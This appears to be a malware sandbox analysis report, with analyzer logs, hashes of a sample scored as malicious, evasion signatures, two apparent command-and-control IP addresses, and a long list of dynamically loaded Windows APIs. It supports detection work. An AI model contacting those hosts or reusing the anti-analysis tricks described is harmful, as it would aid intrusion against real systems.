2019-09-11 14:42:14,867 [root] INFO: Terminate event set for process 3012.
2019-09-11 14:42:14,867 [root] INFO: Terminating process 3012 before shutdown.
2019-09-11 14:42:14,867 [root] INFO: Waiting for process 3012 to exit.
2019-09-11 14:42:14,867 [root] DEBUG: Terminate Event: Attempting to dump process 3012
2019-09-11 14:42:14,928 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x003B0000.
2019-09-11 14:42:14,976 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x003B0000.
2019-09-11 14:42:15,006 [root] DEBUG: DumpProcess: Module entry point VA is 0x00002F3B.
2019-09-11 14:42:15,115 [root] ERROR: Traceback (most recent call last):
  File "C:\ttdrm\analyzer.py", line 742, in run
    proc_dump(file_path)
  File "C:\ttdrm\analyzer.py", line 235, in proc_dump
    sha256 = hash_file(hashlib.sha256, file_path)
  File "C:\ttdrm\lib\common\hashing.py", line 17, in hash_file
    buf = f.read(BUFSIZE)
MemoryError
Traceback (most recent call last):
  File "C:\ttdrm\analyzer.py", line 742, in run
    proc_dump(file_path)
  File "C:\ttdrm\analyzer.py", line 235, in proc_dump
    sha256 = hash_file(hashlib.sha256, file_path)
  File "C:\ttdrm\lib\common\hashing.py", line 17, in hash_file
    buf = f.read(BUFSIZE)
MemoryError
2019-09-11 14:42:15,881 [root] INFO: Waiting for process 3012 to exit.
2019-09-11 14:42:16,894 [root] INFO: Waiting for process 3012 to exit.
2019-09-11 14:42:17,908 [root] INFO: Waiting for process 3012 to exit.
2019-09-11 14:42:18,923 [lib.api.process] INFO: Successfully terminated process with pid 3012.
2019-09-11 14:42:18,923 [root] INFO: Waiting for process 3012 to exit.
2019-09-11 14:42:19,937 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2556
2019-09-11 14:42:19,937 [root] DEBUG: Terminate Event: Attempting to dump process 2556
2019-09-11 14:42:19,937 [root] INFO: Terminate event set for process 2556.
2019-09-11 14:42:19,937 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x003B0000.
2019-09-11 14:42:19,937 [root] INFO: Terminating process 2556 before shutdown.
2019-09-11 14:42:19,937 [root] INFO: Waiting for process 2556 to exit.
2019-09-11 14:42:19,937 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x003B0000.
2019-09-11 14:42:19,937 [root] DEBUG: DumpProcess: Module entry point VA is 0x00002F3B.
2019-09-11 14:42:19,983 [root] INFO: Added new CAPE file to list with path: C:\QnnyUFjf\CAPE\2556_18019540819421311392019
2019-09-11 14:42:19,983 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x22a00.
2019-09-11 14:42:20,950 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2444
2019-09-11 14:42:20,950 [root] INFO: Terminate event set for process 2444.
2019-09-11 14:42:20,950 [root] INFO: Terminating process 2444 before shutdown.
2019-09-11 14:42:20,950 [root] INFO: Waiting for process 2444 to exit.
2019-09-11 14:42:21,964 [root] INFO: Waiting for process 2444 to exit.
2019-09-11 14:42:22,979 [root] INFO: Waiting for process 2444 to exit.
2019-09-11 14:42:23,993 [root] INFO: Waiting for process 2444 to exit.
2019-09-11 14:42:25,006 [lib.api.process] INFO: Successfully terminated process with pid 2444.
2019-09-11 14:42:25,006 [root] INFO: Waiting for process 2444 to exit.
2019-09-11 14:42:26,020 [root] INFO: Shutting down package.
2019-09-11 14:42:26,020 [root] INFO: Stopping auxiliary modules.
2019-09-11 14:42:26,020 [root] INFO: Finishing auxiliary modules.
2019-09-11 14:42:26,020 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-09-11 14:42:26,020 [root] WARNING: File at path "C:\QnnyUFjf\debugger" does not exist, skip.
2019-09-11 14:42:26,020 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-02 target-02 ESX 2019-09-11 13:38:44 2019-09-11 13:42:41

File Details

File Name 2c642d5ff657c9788daac44c9040bfb742175dff6c8570805d8b38729c9bae24
File Size 76368 bytes
File Type C++ source, ASCII text, with very long lines
MD5 74ef0238c0a6ff17795051958c326a00
SHA1 2227a82ae3c9759d6f8b169ac3d0ef31bb389adb
SHA256 2c642d5ff657c9788daac44c9040bfb742175dff6c8570805d8b38729c9bae24
SHA512 c412d8fcabe156d8b8b902e5d7bb0c59c5f1a826008dc0240e1deb03034d7c9f98ecbe1e44c2d7ea64d33da56643c7fc00014350e717ad894de843db48205a61
CRC32 A22D1B0F
Ssdeep 1536:4W43tGYz27qnLgpcHoWemuqlHsHfnSkWTgrSDcEgQe62B50f/Ohe6gJkgwu:Jpq2WnvHMhqU2f+m
TrID
  • Unknown!
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Attempts to connect to a dead IP:Port (2 unique times)
IP: 79.134.225.73:5000 (Switzerland)
IP: 185.206.227.180:1901 (United Kingdom)
Possible date expiration check, exits too soon after checking local time
process: wscript.exe, PID 2008
Detected script timer window indicative of sleep style evasion
Window: WSH-Timer
A process attempted to delay the analysis task.
Process: WmiPrvSE.exe tried to sleep 660 seconds, actually delayed analysis time by 0 seconds
Process: wscript.exe tried to sleep 1800 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: wscript.exe/
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: PROPSYS.dll/PSCreateMemoryPropertyStore
DynamicLoader: PROPSYS.dll/PSPropertyBag_WriteDWORD
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadDWORD
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadGUID
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: urlmon.dll/CreateUri
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: SHELL32.dll/
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadStrAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: PROPSYS.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ole32.dll/CoTaskMemRealloc
DynamicLoader: PROPSYS.dll/InitPropVariantFromStringAsVector
DynamicLoader: PROPSYS.dll/PSCoerceToCanonicalValue
DynamicLoader: PROPSYS.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: ole32.dll/CoAllowSetForegroundWindow
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: ADVAPI32.dll/SaferGetPolicyInformation
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/SHGetPathFromIDListW
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: PROPSYS.dll/PSPropertyBag_WriteStr
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/PSPropertyBag_WriteGUID
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: kernel32.dll/GetCalendarInfoW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: SHELL32.dll/SHGetPathFromIDListW
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PSPropertyBag_WriteStr
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PSPropertyBag_WriteGUID
DynamicLoader: propsys.dll/PSPropertyBag_ReadGUID
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: kernel32.dll/GetCalendarInfoW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: urlmon.dll/DllCanUnloadNow
DynamicLoader: urlmon.dll/IEDllLoader
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: urlmon.dll/CoInternetGetSession
DynamicLoader: urlmon.dll/CopyBindInfo
DynamicLoader: urlmon.dll/CreateURLMoniker
DynamicLoader: urlmon.dll/RegisterBindStatusCallback
DynamicLoader: urlmon.dll/ReleaseBindInfo
DynamicLoader: urlmon.dll/RevokeBindStatusCallback
DynamicLoader: urlmon.dll/UrlMkGetSessionOption
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CreateUri
DynamicLoader: urlmon.dll/CoInternetCombineUrl
DynamicLoader: urlmon.dll/CoInternetGetSecurityUrl
DynamicLoader: urlmon.dll/IsValidURL
DynamicLoader: WININET.dll/InternetCrackUrlW
DynamicLoader: WININET.dll/InternetCreateUrlW
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/MkParseDisplayName
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
DynamicLoader: ole32.dll/BindMoniker
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: ADVAPI32.dll/AddMandatoryAce
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: urlmon.dll/CoInternetIsFeatureEnabledForUrl
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: wscript.exe/
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: PROPSYS.dll/PSCreateMemoryPropertyStore
DynamicLoader: PROPSYS.dll/PSPropertyBag_WriteDWORD
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: Comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadDWORD
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadGUID
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: urlmon.dll/CreateUri
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadStrAlloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: PROPSYS.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ole32.dll/CoTaskMemRealloc
DynamicLoader: PROPSYS.dll/InitPropVariantFromStringAsVector
DynamicLoader: PROPSYS.dll/PSCoerceToCanonicalValue
DynamicLoader: PROPSYS.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: ole32.dll/CoAllowSetForegroundWindow
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: ADVAPI32.dll/SaferGetPolicyInformation
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: Comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: Comctl32.dll/
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: Comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: SHELL32.dll/SHGetPathFromIDListW
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: PROPSYS.dll/PSPropertyBag_WriteStr
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/PSPropertyBag_WriteGUID
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: urlmon.dll/DllCanUnloadNow
DynamicLoader: urlmon.dll/IEDllLoader
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: urlmon.dll/CoInternetGetSession
DynamicLoader: urlmon.dll/CopyBindInfo
DynamicLoader: urlmon.dll/CreateURLMoniker
DynamicLoader: urlmon.dll/RegisterBindStatusCallback
DynamicLoader: urlmon.dll/ReleaseBindInfo
DynamicLoader: urlmon.dll/RevokeBindStatusCallback
DynamicLoader: urlmon.dll/UrlMkGetSessionOption
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CreateUri
DynamicLoader: urlmon.dll/CoInternetCombineUrl
DynamicLoader: urlmon.dll/CoInternetGetSecurityUrl
DynamicLoader: urlmon.dll/IsValidURL
DynamicLoader: WININET.dll/InternetCrackUrlW
DynamicLoader: WININET.dll/InternetCreateUrlW
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/MkParseDisplayName
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
DynamicLoader: ole32.dll/BindMoniker
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: ADVAPI32.dll/AddMandatoryAce
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: urlmon.dll/CoInternetIsFeatureEnabledForUrl
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegCreateKeyExW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExW
DynamicLoader: kernel32.dll/GetVolumePathNameW
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/Process32First
DynamicLoader: kernel32.dll/Process32Next
DynamicLoader: kernel32.dll/Module32First
DynamicLoader: kernel32.dll/Module32Next
DynamicLoader: kernel32.dll/Heap32ListFirst
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: kernel32.dll/GetSystemDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WINBRAND.dll/BrandingLoadString
DynamicLoader: SECURITY.DLL/InitSecurityInterfaceW
DynamicLoader: CRYPTSP.dll/SystemFunction035
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/NtSetSystemEnvironmentValue
DynamicLoader: ntdll.dll/NtQuerySystemEnvironmentValue
DynamicLoader: ntdll.dll/NtCreateFile
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQueryDirectoryObject
DynamicLoader: ntdll.dll/NtQueryObject
